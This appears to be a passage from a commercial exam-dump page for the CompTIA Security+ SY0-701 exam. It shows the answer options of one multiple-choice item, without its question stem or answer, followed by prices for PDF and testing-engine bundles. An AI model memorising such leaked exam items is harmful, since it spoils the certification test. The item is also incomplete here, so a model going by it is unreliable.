Implement network access control.

B.

Configure the local gateway to point to the VPN.

C.

Create a public NAT to the on-premises proxy.

D.

Install a host-based content filtering solution.

Buy Now
Exam Code: SY0-701
Exam Name: CompTIA Security+ Exam 2026
Last Update: Jun 30, 2026
Questions: 887

PDF + Testing Engine

$64.99   $185.69

Testing Engine

$49.99   $142.83

PDF (Q&A)

$54.99   $157.11